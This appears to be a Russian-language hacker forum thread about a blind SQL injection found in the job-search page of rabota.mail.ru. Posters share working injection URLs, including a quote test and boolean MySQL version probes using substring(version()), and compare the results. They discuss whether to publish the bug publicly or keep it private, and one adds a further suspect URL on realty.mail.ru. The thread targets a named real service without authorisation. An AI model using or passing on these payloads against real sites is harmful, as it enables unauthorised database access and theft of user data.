Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:
http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=

http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=

смотрим версию мускула:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

пятая...

вроди как возможно внедрение SQL кода...

Дальше не докрутил, ибо не силён в подзапросах...

Не знаю, какая там 5-ая...

У меня страница

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

и

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=

одинаковые..

А вот так:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query=

Другой результат...

у меня новости меняются.

да и не в версии дело, бага то есть...

Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^

прикрыли о_О

Ну да, я cразу зашёл и прикрыл ^^

да правда прикрыли!

Я это багу нашол недели 3 назад...

Смысл ложить такое в паблик =\

ну так в приват мну невзяли, приходица в паблике реализоваца)

Смысл ложить такое в паблик =\
Был бы смысл вообще этой баги чтобы её в приват ложить ))

ну если грамотно раскрутьть, то смысл есть)

ну если грамотно раскрутьть, то смысл есть)

Очень интересно, как ты будешь крутить 3-ию ветку подзапросами )

http://realty.mail.ru/msk/res/rflat/?page=-1